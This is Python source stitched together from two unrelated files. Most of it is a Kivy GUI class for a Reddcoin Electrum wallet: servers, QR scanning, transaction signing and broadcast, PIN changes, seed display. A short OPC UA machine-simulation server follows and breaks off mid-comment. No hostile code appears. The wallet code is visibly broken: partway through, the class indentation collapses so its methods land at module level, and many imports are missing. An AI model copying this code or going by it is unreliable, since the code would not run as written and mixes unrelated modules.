from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
# lazy imports for factory so that widgets can be used in kv
Factory.register('InstallWizard',
                 module='reddelectrum_gui.kivy.uix.dialogs.installwizard')
Factory.register('InfoBubble', module='reddelectrum_gui.kivy.uix.dialogs')
Factory.register('OutputList', module='reddelectrum_gui.kivy.uix.dialogs')
Factory.register('OutputItem', module='reddelectrum_gui.kivy.uix.dialogs')
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register widget cache for keeping memory down; timeout of 0 means cache
# the data forever
Cache.register('reddelectrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='reddelectrum_gui.kivy.uix.screens')
# Register fonts; without this you won't be able to use bold/italic
# inside markup.
# NOTE(review): this import shadows kivy.uix.label.Label imported above --
# presumably intentional since only core-text Label.register is needed here;
# verify before reordering.
from kivy.core.text import Label
Label.register('Roboto',
               'gui/kivy/data/fonts/Roboto.ttf',
               'gui/kivy/data/fonts/Roboto.ttf',
               'gui/kivy/data/fonts/Roboto-Bold.ttf',
               'gui/kivy/data/fonts/Roboto-Bold.ttf')
from reddelectrum.util import base_units
class ElectrumWindow(App):
    """Kivy application window for the Reddcoin Electrum GUI."""

    # Config object, assigned by the GUI entry point.
    electrum_config = ObjectProperty(None)
    language = StringProperty('en')

    # properties might be updated by the network
    num_blocks = NumericProperty(0)
    num_nodes = NumericProperty(0)
    server_host = StringProperty('')
    server_port = StringProperty('')
    num_chains = NumericProperty(0)
    blockchain_name = StringProperty('')
    blockchain_checkpoint = NumericProperty(0)

    auto_connect = BooleanProperty(False)
    def on_auto_connect(self, instance, x):
        # Push the new auto_connect flag to the network layer, keeping the
        # other connection parameters unchanged.
        host, port, protocol, proxy, auto_connect = self.network.get_parameters()
        self.network.set_parameters(host, port, protocol, proxy, self.auto_connect)

    def toggle_auto_connect(self, x):
        self.auto_connect = not self.auto_connect

    def choose_server_dialog(self, popup):
        """Open a chooser of known servers; fill the popup's host/port
        fields on selection."""
        from uix.dialogs.choice_dialog import ChoiceDialog
        protocol = 's'
        def cb2(host):
            from reddelectrum.network import DEFAULT_PORTS
            # `servers` is bound below but resolved when cb2 runs (closure).
            pp = servers.get(host, DEFAULT_PORTS)
            port = pp.get(protocol, '')
            popup.ids.host.text = host
            popup.ids.port.text = port
        servers = self.network.get_servers()
        ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()

    def choose_blockchain_dialog(self, dt):
        """Open a chooser of competing chains (only when more than one exists)."""
        from uix.dialogs.choice_dialog import ChoiceDialog
        chains = self.network.get_blockchains()
        def cb(name):
            for index, b in self.network.blockchains.items():
                if name == self.network.get_blockchain_name(b):
                    self.network.follow_chain(index)
            #self.block
        names = [self.network.blockchains[b].get_name() for b in chains]
        if len(names) >1:
            ChoiceDialog(_('Choose your chain'), names, '', cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.electrum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
    """Open the send tab pre-filled from a payment URI."""
    self.switch_to('send')
    self.send_screen.set_URI(uri)

def on_new_intent(self, intent):
    # Android intent handler: only react to reddcoin: URIs.
    if intent.getScheme() != 'reddcoin':
        return
    self.set_URI(intent.getDataString())

def on_language(self, instance, language):
    Logger.info('language: {}'.format(language))
    _.switch_lang(language)

def update_history(self, *dt):
    if self.history_screen:
        self.history_screen.update()

def on_quotes(self, d):
    Logger.info("on_quotes")
    self._trigger_update_history()

def on_history(self, d):
    Logger.info("on_history")
    self._trigger_update_history()

def _get_bu(self):
    # Display unit, persisted in the config; defaults to RDD.
    return self.electrum_config.get('base_unit', 'RDD')

def _set_bu(self, value):
    assert value in base_units.keys()
    self.electrum_config.set_key('base_unit', value, True)
    self._trigger_update_status()
    self._trigger_update_history()

base_unit = AliasProperty(_get_bu, _set_bu)
status = StringProperty('')
fiat_unit = StringProperty('')

def on_fiat_unit(self, a, b):
    self._trigger_update_history()

def decimal_point(self):
    """Number of decimal places of the current base unit."""
    return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
    """Convert an amount string in the current base unit to fiat text."""
    if not amount_str:
        return ''
    rate = self.fx.exchange_rate()
    if not rate:
        return ''
    # get_amount() yields satoshis, hence the fixed 10**8 divisor.
    fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
    return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')

def fiat_to_btc(self, fiat_amount):
    """Convert a fiat amount to a plain string in the current base unit."""
    if not fiat_amount:
        return ''
    rate = self.fx.exchange_rate()
    if not rate:
        return ''
    satoshis = int(pow(10, 8) * Decimal(fiat_amount) / Decimal(rate))
    return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
    """Parse '<number> <unit>' into an integer satoshi amount.

    Returns None when the numeric part does not parse.  Asserts that the
    unit matches the currently configured base unit.
    """
    a, u = amount_str.split()
    assert u == self.base_unit
    try:
        x = Decimal(a)
    except Exception:
        # Was a bare 'except:' - that also swallowed SystemExit and
        # KeyboardInterrupt; only parse failures should yield None.
        return None
    p = pow(10, self.decimal_point())
    return int(p * x)
_orientation = OptionProperty('landscape', options=('landscape', 'portrait'))

def _get_orientation(self):
    return self._orientation

orientation = AliasProperty(_get_orientation, None, bind=('_orientation',))
'''Current screen orientation, derived from the window size.

:data:`orientation` is a read-only `AliasProperty`. Defaults to 'landscape'.
'''

_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))

def _get_ui_mode(self):
    return self._ui_mode

ui_mode = AliasProperty(_get_ui_mode, None, bind=('_ui_mode',))
'''Kind of device the app is running on. Can be one of `tablet` or `phone`.

:data:`ui_mode` is a read-only `AliasProperty`. Defaults to 'phone'.
'''
def __init__(self, **kwargs):
    """Set plain defaults, read config/network kwargs and create the
    throttled UI-update triggers."""
    self._clipboard = Clipboard
    self.info_bubble = None
    self.nfcscanner = None
    self.tabs = None
    self.is_exit = False
    self.wallet = None
    super(ElectrumWindow, self).__init__(**kwargs)

    # NOTE(review): local 'title' is never used - possibly meant self.title.
    title = _('reddelectrum App')
    self.electrum_config = config = kwargs.get('config', None)
    self.language = config.get('language', 'en')
    self.network = network = kwargs.get('network', None)
    if self.network:
        self.num_blocks = self.network.get_local_height()
        self.num_nodes = len(self.network.get_interfaces())
        host, port, protocol, proxy_config, auto_connect = self.network.get_parameters()
        self.server_host = host
        self.server_port = port
        self.auto_connect = auto_connect
        self.proxy_config = proxy_config if proxy_config else {}

    self.plugins = kwargs.get('plugins', [])
    self.gui_object = kwargs.get('gui_object', None)
    self.daemon = self.gui_object.daemon
    self.fx = self.daemon.fx

    self.use_rbf = config.get('use_rbf', False)
    self.use_change = config.get('use_change', True)
    self.use_unconfirmed = not config.get('confirmed_only', False)

    # Throttle UI refreshes to at most twice per second.
    self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
    self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
    self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
    self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)

    # Dialogs are cached and re-used.
    self._settings_dialog = None
    self._password_dialog = None
def wallet_name(self):
    """Base name of the open wallet file, or a single space when none."""
    if not self.wallet:
        return ' '
    return os.path.basename(self.wallet.storage.path)
def on_pr(self, pr):
    """Handle an incoming BIP70 payment request."""
    if pr.verify(self.wallet.contacts):
        key = self.wallet.invoices.add(pr)
        if self.invoices_screen:
            self.invoices_screen.update()
        status = self.wallet.invoices.get_status(key)
        if status == PR_PAID:
            self.show_error("invoice already paid")
            self.send_screen.do_clear()
        elif pr.has_expired():
            self.show_error(_('Payment request has expired'))
        else:
            self.switch_to('send')
            self.send_screen.set_request(pr)
    else:
        self.show_error("invoice error:" + pr.error)
        self.send_screen.do_clear()

def on_qr(self, data):
    """Dispatch scanned QR content: address, payment URI or raw transaction."""
    from reddelectrum.bitcoin import base_decode, is_address
    data = data.strip()
    # Plain addresses and payment URIs go straight to the send screen.
    if is_address(data) or data.startswith('reddcoin:'):
        self.set_URI(data)
        return
    # Otherwise try to interpret the payload as a base43-encoded transaction.
    from reddelectrum.transaction import Transaction
    try:
        # NOTE(review): str.encode('hex') is Python 2 only - confirm the
        # supported interpreter version before touching this line.
        text = base_decode(data, None, base=43).encode('hex')
        tx = Transaction(text)
        tx.deserialize()
    except:
        tx = None
    if tx:
        self.tx_dialog(tx)
        return
    self.show_error("Unable to decode QR data")
def update_tab(self, name):
    """Refresh the screen for tab *name* if it has been created."""
    screen = getattr(self, name + '_screen', None)
    if screen:
        screen.update()

@profiler
def update_tabs(self):
    """Refresh every tab screen."""
    for tab in ['invoices', 'send', 'history', 'receive', 'requests']:
        self.update_tab(tab)

def switch_to(self, name):
    """Make tab *name* active, lazily loading its screen widget."""
    screen = getattr(self, name + '_screen', None)
    if screen is None:
        screen = self.tabs.ids[name + '_screen']
        screen.load_screen()
    panel = self.tabs.ids.panel
    panel.switch_to(self.tabs.ids[name + '_tab'])
def show_request(self, addr):
    self.switch_to('receive')
    self.receive_screen.screen.address = addr

def show_pr_details(self, req, status, is_invoice):
    """Open the invoice/request details popup for *req*."""
    from reddelectrum.util import format_time
    expiry = req.get('exp')
    memo = req.get('memo')
    popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
    popup.is_invoice = is_invoice
    popup.amount = req.get('amount')
    # Invoices show the requestor; our own requests show the address.
    popup.requestor = req.get('requestor') if is_invoice else req.get('address')
    popup.exp = format_time(expiry) if expiry else ''
    popup.description = memo if memo else ''
    popup.signature = req.get('signature', '')
    popup.status = status
    popup.tx_hash = req.get('txid') or ''
    popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
    popup.open()

def qr_dialog(self, title, data, show_text=False):
    from uix.dialogs.qr_dialog import QRDialog
    QRDialog(title, data, show_text).open()
def _qr_result_handler(self, on_complete):
    """Build an android activity-result callback for a QR scan.

    Shared by scan_qr() and scan_qr_zxing(), which previously carried two
    identical copies of this closure.  Calls *on_complete* with the
    scanned text when a QR code was read, shows an error otherwise.
    """
    def on_qr_result(requestCode, resultCode, intent):
        if requestCode != 0:
            return
        if resultCode == -1:  # Activity.RESULT_OK
            contents = intent.getStringExtra("SCAN_RESULT")
            if intent.getStringExtra("SCAN_RESULT_FORMAT") == 'QR_CODE':
                on_complete(contents)
            else:
                self.show_error("wrong format " + intent.getStringExtra("SCAN_RESULT_FORMAT"))
    return on_qr_result

def scan_qr(self, on_complete):
    """Scan a QR code via the external ZXing barcode scanner app."""
    if platform != 'android':
        return
    from jnius import autoclass
    from android import activity
    PythonActivity = autoclass('org.kivy.android.PythonActivity')
    Intent = autoclass('android.content.Intent')
    intent = Intent("com.google.zxing.client.android.SCAN")
    intent.putExtra("SCAN_MODE", "QR_CODE_MODE")
    activity.bind(on_activity_result=self._qr_result_handler(on_complete))
    try:
        PythonActivity.mActivity.startActivityForResult(intent, 0)
    except:
        self.show_error(_('Could not start Barcode Scanner.') + ' ' + _('Please install the Barcode Scanner app from ZXing'))

def scan_qr_zxing(self, on_complete):
    """Scan a QR code using the embedded ZXing library."""
    if platform != 'android':
        return
    from jnius import autoclass
    from android import activity
    PythonActivity = autoclass('org.kivy.android.PythonActivity')
    IntentIntegrator = autoclass('com.google.zxing.integration.android.IntentIntegrator')
    integrator = IntentIntegrator(PythonActivity.mActivity)
    activity.bind(on_activity_result=self._qr_result_handler(on_complete))
    integrator.initiateScan()

def do_share(self, data, title):
    """Share *data* as plain text via the android share sheet."""
    if platform != 'android':
        return
    from jnius import autoclass, cast
    JS = autoclass('java.lang.String')
    Intent = autoclass('android.content.Intent')
    sendIntent = Intent()
    sendIntent.setAction(Intent.ACTION_SEND)
    sendIntent.setType("text/plain")
    sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
    PythonActivity = autoclass('org.kivy.android.PythonActivity')
    currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
    it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
    currentActivity.startActivity(it)
def build(self):
    """Kivy entry point: load the root widget tree."""
    return Builder.load_file('gui/kivy/main.kv')

def _pause(self):
    # On android, send the activity to the background instead of quitting.
    if platform == 'android':
        from jnius import autoclass
        python_act = autoclass('org.kivy.android.PythonActivity')
        python_act.mActivity.moveTaskToBack(True)
def on_start(self):
    """Start point of the kivy UI: bind window events, build the UI,
    load the last wallet and hook up network callbacks."""
    import time
    # time.clock() was removed in Python 3.8; prefer perf_counter and only
    # fall back to clock on interpreters that lack it (Python 2).
    _clock = getattr(time, 'perf_counter', None) or time.clock
    Logger.info('Time to on_start: {} <<<<<<<<'.format(_clock()))
    win = Window
    win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
    win.bind(on_key_down=self.on_key_down)
    self.on_size(win, win.size)
    self.init_ui()
    self.load_wallet_by_name(self.electrum_config.get_wallet_path())
    # init plugins
    run_hook('init_kivy', self)
    # fiat currency
    self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
    # default tab
    self.switch_to('history')
    # bind intent for the reddcoin: URI scheme
    if platform == 'android':
        from android import activity
        from jnius import autoclass
        PythonActivity = autoclass('org.kivy.android.PythonActivity')
        mactivity = PythonActivity.mActivity
        self.on_new_intent(mactivity.getIntent())
        activity.bind(on_new_intent=self.on_new_intent)
    # connect network callbacks
    if self.network:
        interests = ['updated', 'status', 'new_transaction', 'verified', 'interfaces']
        self.network.register_callback(self.on_network_event, interests)
        self.network.register_callback(self.on_quotes, ['on_quotes'])
        self.network.register_callback(self.on_history, ['on_history'])
    # URI passed in config
    uri = self.electrum_config.get('url')
    if uri:
        self.set_URI(uri)
def get_wallet_path(self):
    """Path of the open wallet file, or '' when no wallet is loaded."""
    if not self.wallet:
        return ''
    return self.wallet.storage.path

def on_wizard_complete(self, instance, wallet):
    if wallet:
        wallet.start_threads(self.daemon.network)
        self.daemon.add_wallet(wallet)
        self.load_wallet(wallet)
    self.on_resume()

def load_wallet_by_name(self, path):
    """Open the wallet at *path*, launching the install wizard when the
    file does not exist yet."""
    if not path:
        return
    wallet = self.daemon.load_wallet(path, None)
    if wallet:
        if wallet != self.wallet:
            self.stop_wallet()
            self.load_wallet(wallet)
            self.on_resume()
    else:
        Logger.debug('Electrum: Wallet not found. Launching install wizard')
        storage = WalletStorage(path)
        wizard = Factory.InstallWizard(self.electrum_config, storage)
        wizard.bind(on_wizard_complete=self.on_wizard_complete)
        action = wizard.storage.get_action()
        wizard.run(action)

def on_stop(self):
    self.stop_wallet()

def stop_wallet(self):
    """Detach the current wallet (if any) from the daemon."""
    if self.wallet:
        self.daemon.stop_wallet(self.wallet.storage.path)
        self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
    """Global ctrl-key shortcuts."""
    if 'ctrl' not in modifiers:
        return
    if keycode in (24, 25):    # ctrl+q / ctrl+w: quit
        self.stop()
    elif keycode == 27:        # ctrl+r: force a wallet refresh
        self.update_wallet()
    elif keycode == 112:       # pageup - TODO move to next tab
        pass
    elif keycode == 117:       # pagedown - TODO move to prev tab
        pass
    # TODO: alt+<tab number> to activate that particular tab

def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
    """Handle the android back and settings buttons."""
    if key == 27 and self.is_exit is False:
        # First back press only warns; the next one exits.
        self.is_exit = True
        self.show_info(_('Press again to exit'))
        return True
    if key in (319, 282):  # f1 / settings button on android
        # settings toggle intentionally disabled here
        return True
def settings_dialog(self):
    """Open (and lazily create) the cached settings dialog."""
    if self._settings_dialog is None:
        from uix.dialogs.settings import SettingsDialog
        self._settings_dialog = SettingsDialog(self)
    self._settings_dialog.update()
    self._settings_dialog.open()

def popup_dialog(self, name):
    """Open a popup by name; generic popups are loaded from '<name>.kv'."""
    if name == 'settings':
        self.settings_dialog()
    elif name == 'wallets':
        from uix.dialogs.wallets import WalletDialog
        WalletDialog().open()
    else:
        Builder.load_file('gui/kivy/uix/ui_screens/' + name + '.kv').open()
@profiler
def init_ui(self):
    """Initialize the UX part of electrum: register lazily imported
    widget factories and wire up the main-screen references."""
    from weakref import ref
    self.funds_error = False
    self.screens = {}
    # Lazy imports for the main screen widgets.
    Factory.register('AnimatedPopup', module='reddelectrum_gui.kivy.uix.dialogs')
    Factory.register('QRCodeWidget', module='reddelectrum_gui.kivy.uix.qrcodewidget')
    # Load and focus the UI.
    self.root.manager = self.root.ids['manager']
    self.history_screen = None
    self.contacts_screen = None
    self.send_screen = None
    self.invoices_screen = None
    self.receive_screen = None
    self.requests_screen = None
    self.icon = "icons/reddelectrum.png"
    self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
    """Refresh node/chain counters from the network layer."""
    self.num_nodes = len(self.network.get_interfaces())
    self.num_chains = len(self.network.get_blockchains())
    chain = self.network.blockchain()
    self.blockchain_checkpoint = chain.get_checkpoint()
    self.blockchain_name = chain.get_name()
    if self.network.interface:
        self.server_host = self.network.interface.host

def on_network_event(self, event, *args):
    """Map network callbacks onto the matching throttled UI triggers."""
    Logger.info('network event: ' + event)
    triggers = {
        'interfaces': (self._trigger_update_interfaces,),
        'updated': (self._trigger_update_wallet, self._trigger_update_status),
        'status': (self._trigger_update_status,),
        'new_transaction': (self._trigger_update_wallet,),
        'verified': (self._trigger_update_wallet,),
    }
    for trigger in triggers.get(event, ()):
        trigger()
@profiler
def load_wallet(self, wallet):
    """Attach *wallet* to the UI and refresh everything."""
    self.wallet = wallet
    self.update_wallet()
    # Callbacks may have fired before the GUI was initialized; clear any
    # stale announcement on the receive screen now.
    if self.receive_screen:
        self.receive_screen.clear()
    self.update_tabs()
    run_hook('load_wallet', wallet, self)

def update_status(self, *dt):
    """Recompute the status line shown in the header."""
    self.num_blocks = self.network.get_local_height()
    if not self.wallet:
        self.status = _("No Wallet")
        return
    if self.network is None or not self.network.is_running():
        status = _("Offline")
    elif self.network.is_connected():
        server_height = self.network.get_server_height()
        server_lag = self.network.get_local_height() - server_height
        if not self.wallet.up_to_date or server_height == 0:
            status = _("Synchronizing...")
        elif server_lag > 1:
            status = _("Server lagging (%d blocks)" % server_lag)
        else:
            c, u, x = self.wallet.get_balance()
            text = self.format_amount(c + x + u)
            status = str(text.strip() + ' ' + self.base_unit)
    else:
        status = _("Disconnected")
    self.status = '[size=15dp]%s[/size]\n%s' % (self.wallet.basename(), status)
def get_max_amount(self):
    """Amount string for sweeping the whole balance to the entered address."""
    inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
    addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
    outputs = [(TYPE_ADDRESS, addr, '!')]
    tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
    return format_satoshis_plain(tx.output_value(), self.decimal_point())

def format_amount(self, x, is_diff=False, whitespaces=False):
    return format_satoshis(x, is_diff, 0, self.decimal_point(), whitespaces)

def format_amount_and_units(self, x):
    return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit

@profiler
def update_wallet(self, *dt):
    """Refresh the tabs once the wallet is synced (or we are offline)."""
    self._trigger_update_status()
    if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
        self.update_tabs()
def notify(self, message):
    """Show a desktop/mobile notification via plyer (best effort).

    Fixes two defects: the first call raised NameError because
    'notification' was tested before it was ever bound (and only
    ImportError was caught), and the handler called Logger.Error, which
    is not a valid logging method (should be Logger.error).
    """
    try:
        global notification
        if globals().get('notification') is None:
            from plyer import notification
        icon = (os.path.dirname(os.path.realpath(__file__))
                + '/../../' + self.icon)
        notification.notify('reddelectrum', message,
                            app_icon=icon, app_name='reddelectrum')
    except ImportError:
        Logger.error('Notification: needs plyer; `sudo pip install plyer`')

def on_pause(self):
    # Disable NFC while the app is backgrounded.
    if self.nfcscanner:
        self.nfcscanner.nfc_disable()
    return True

def on_resume(self):
    if self.nfcscanner:
        self.nfcscanner.nfc_enable()
    # Workaround for a python-for-android bug: show an empty info bubble
    # to force a display refresh.
    self.show_info_bubble('', duration=0.1, pos=(0, 0), width=1, arrow_pos=None)
def on_size(self, instance, value):
    """Track window size to derive orientation and phone/tablet mode."""
    width, height = value
    self._orientation = 'landscape' if width > height else 'portrait'
    self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'

def on_ref_label(self, label, touch):
    """First tap copies the label data; a second tap shows it as a QR code."""
    if label.touched:
        label.touched = False
        self.qr_dialog(label.name, label.data, True)
    else:
        label.touched = True
        self._clipboard.copy(label.data)
        Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))

def set_send(self, address, amount, label, message):
    self.send_payment(address, amount=amount, label=label, message=message)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
               exit=False, icon='atlas://gui/kivy/theming/light/error', duration=0,
               modal=False):
    """Show an error message bubble."""
    self.show_info_bubble(text=error, icon=icon, width=width,
                          pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
                          duration=duration, modal=modal)

def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
              exit=False, duration=0, modal=False):
    """Show an info message bubble."""
    self.show_error(error, icon='atlas://gui/kivy/theming/light/important',
                    duration=duration, modal=modal, exit=exit, pos=pos,
                    arrow_pos=arrow_pos)

def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
                     arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
    """Show an information bubble.

    text: message to display; the sentinel 'texture' renders *icon* as a
        full-screen texture instead of text
    pos: bubble position; defaults to just below the window center
    duration: seconds shown, 0 = click to hide
    width: bubble width
    arrow_pos: arrow anchor, or None for no arrow
    """
    info_bubble = self.info_bubble
    if not info_bubble:
        info_bubble = self.info_bubble = Factory.InfoBubble()
    win = Window
    if info_bubble.parent:
        # Detach a bubble that is still on screen (modal bubbles live
        # inside their modal view).
        win.remove_widget(info_bubble
                          if not info_bubble.modal else
                          info_bubble._modal_view)
    if not arrow_pos:
        info_bubble.show_arrow = False
    else:
        info_bubble.show_arrow = True
        info_bubble.arrow_pos = arrow_pos
    img = info_bubble.ids.img
    if text == 'texture':
        # 'icon' holds a texture, not a source path: show it full screen.
        text = ''
        img.texture = icon
        info_bubble.fs = True
        info_bubble.show_arrow = False
        img.allow_stretch = True
        info_bubble.dim_background = True
        info_bubble.background_image = 'atlas://gui/kivy/theming/light/card'
    else:
        info_bubble.fs = False
        info_bubble.icon = icon
        img.allow_stretch = False
        info_bubble.dim_background = False
        info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
    info_bubble.message = text
    if not pos:
        pos = (win.center[0], win.center[1] - (info_bubble.height / 2))
    info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
    from uix.dialogs.tx_dialog import TxDialog
    TxDialog(self, tx).open()

def sign_tx(self, *args):
    # Signing may block; run it off the UI thread.
    threading.Thread(target=self._sign_tx, args=args).start()

def _sign_tx(self, tx, password, on_success, on_failure):
    """Worker: sign *tx* and report back on the UI thread."""
    try:
        self.wallet.sign_transaction(tx, password)
    except InvalidPassword:
        Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
        return
    Clock.schedule_once(lambda dt: on_success(tx))

def _broadcast_thread(self, tx, on_complete):
    ok, txid = self.network.broadcast(tx)
    Clock.schedule_once(lambda dt: on_complete(ok, txid))

def broadcast(self, tx, pr=None):
    """Broadcast *tx*; marks the matching invoice paid on success."""
    def on_complete(ok, msg):
        if not ok:
            self.show_error(msg)
            return
        self.show_info(_('Payment sent.'))
        if self.send_screen:
            self.send_screen.do_clear()
        if pr:
            self.wallet.invoices.set_paid(pr, tx.txid())
            self.wallet.invoices.save()
            self.update_tab('invoices')

    if self.network and self.network.is_connected():
        self.show_info(_('Sending'))
        threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
    else:
        self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
    """Prompt for a payment description and store it on *screen*."""
    from uix.dialogs.label_dialog import LabelDialog

    def on_text(text):
        screen.message = text

    LabelDialog(_('Enter description'), screen.message, on_text).open()

@profiler
def amount_dialog(self, screen, show_max):
    """Open the amount keypad, pre-filled with the screen's amount."""
    from uix.dialogs.amount_dialog import AmountDialog
    amount = screen.amount
    if amount:
        amount, unit = str(amount).split()
        assert unit == self.base_unit

    def on_amount(amount):
        screen.amount = amount

    AmountDialog(show_max, amount, on_amount).open()
def protected(self, msg, f, args):
    """Run f(*args, pin) after asking for the PIN when the wallet has one;
    otherwise call it immediately with None for the PIN."""
    if self.wallet.has_password():
        self.password_dialog(msg, f, args)
    else:
        f(*(args + (None,)))
def delete_wallet(self):
    """Ask for confirmation, then delete the current wallet file."""
    from uix.dialogs.question import Question
    basename = os.path.basename(self.wallet.storage.path)
    Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet).open()

def _delete_wallet(self, b):
    if b:
        basename = os.path.basename(self.wallet.storage.path)
        self.protected(_("Enter your PIN code to confirm deletion of %s") % basename, self.__delete_wallet, ())

def __delete_wallet(self, pw):
    """PIN-checked worker: remove the wallet file, then fall back to the
    default wallet."""
    wallet_path = self.get_wallet_path()
    dirname = os.path.dirname(wallet_path)
    basename = os.path.basename(wallet_path)
    if self.wallet.has_password():
        try:
            self.wallet.check_password(pw)
        except:
            self.show_error("Invalid PIN")
            return
    self.stop_wallet()
    os.unlink(wallet_path)
    self.show_error("Wallet removed:" + basename)
    # NOTE(review): the os.listdir result is unused - possibly meant to
    # pick another existing wallet instead of 'default_wallet'.
    d = os.listdir(dirname)
    self.load_wallet_by_name(os.path.join(dirname, 'default_wallet'))

def show_seed(self, label):
    self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))

def _show_seed(self, label, password):
    """Decrypt the seed (and passphrase) and display them on *label*."""
    if self.wallet.has_password() and password is None:
        return
    keystore = self.wallet.keystore
    try:
        seed = keystore.get_seed(password)
        passphrase = keystore.get_passphrase(password)
    except:
        self.show_error("Invalid PIN")
        return
    label.text = _('Seed') + ':\n' + seed
    if passphrase:
        label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def change_password(self, cb):
    """Start the change-PIN flow; asks for the current PIN first."""
    if self.wallet.has_password():
        self.protected(_("Changing PIN code.") + '\n' + _("Enter your current PIN:"), self._change_password, (cb,))
    else:
        self._change_password(cb, None)

def _change_password(self, cb, old_password):
    # Verify the old PIN before asking for a new one.
    if self.wallet.has_password():
        if old_password is None:
            return
        try:
            self.wallet.check_password(old_password)
        except InvalidPassword:
            self.show_error("Invalid PIN")
            return
    self.password_dialog(_('Enter new PIN'), self._change_password2, (cb, old_password,))

def _change_password2(self, cb, old_password, new_password):
    self.password_dialog(_('Confirm new PIN'), self._change_password3, (cb, old_password, new_password))

def _change_password3(self, cb, old_password, new_password, confirmed_password):
    if new_password == confirmed_password:
        self.wallet.update_password(old_password, new_password)
        cb()
    else:
        self.show_error("PIN numbers do not match")

def password_dialog(self, msg, f, args):
    """Ask for a PIN, then call f(*args, pin) on the next frame."""
    def callback(pw):
        Clock.schedule_once(lambda _: f(*(args + (pw,))), 0.1)
    if self._password_dialog is None:
        from uix.dialogs.password_dialog import PasswordDialog
        self._password_dialog = PasswordDialog()
    self._password_dialog.init(msg, callback)
    self._password_dialog.open()
|
opc_ua_machine.py | # from opcua import Server
from .opc_ua_structure import node_definitions, NAMESPACES, construct_node_structure, Server
from .machine_systems_simulation import system_builder, functions_definitions
import threading
import random
import time
class AMServer:
    """OPC UA server simulating an additive-manufacturing machine.

    The node structure is built once at construction time; start()/stop()
    control both the OPC UA endpoint and the background simulation loop.
    """

    def __init__(self):
        self.url = "opc.tcp://0.0.0.0:4840/"
        self.server = Server()
        self.server.set_endpoint(self.url)
        for namespace in NAMESPACES:
            self.server.register_namespace(namespace)
        self.nodes = node_definitions()
        node_structure_server = construct_node_structure(self.nodes, self.server)
        self.serving = False
        self._running = False
        # Created on demand in _start_process(): a threading.Thread may
        # only be started once, so the original pattern of building it
        # here made start() fail after a stop()/start() cycle.
        self.process_thread = None
        self.machine_functions = system_builder(functions_definitions(), node_structure_server)

    def _start_process(self):
        """(Re)create and start the simulation thread."""
        self._running = True
        # Passing args=(self,) to a bound method was redundant and fed the
        # loop a spurious extra argument.
        self.process_thread = threading.Thread(target=self.proccess)
        self.process_thread.start()

    def setup_nodes(self):
        # Placeholder for future static node setup.
        pass

    def start(self):
        """Start the OPC UA server and the simulation loop (idempotent)."""
        if self.serving:
            return
        self._start_process()
        self.server.start()
        self.serving = True

    def stop(self):
        """Stop the simulation loop and the OPC UA server (idempotent)."""
        if not self.serving:
            return
        # Stop the loop and wait for it before tearing down the server so
        # the thread never touches a stopped server.
        self._running = False
        if self.process_thread is not None:
            self.process_thread.join()
        self.server.stop()
        self.serving = False

    def proccess(self, *args, **kwargs):
        # NOTE: name kept (sic) for backward compatibility with callers.
        """Simulation loop: step every machine system ~10 times a second."""
        while self._running:
            time.sleep(0.1)
            for system in self.machine_functions:
                self.machine_functions[system].process()
if __name__ == '__main__':
    server = AMServer()
    try:
        server.start()
        # Idle until interrupted; sleeping replaces the original
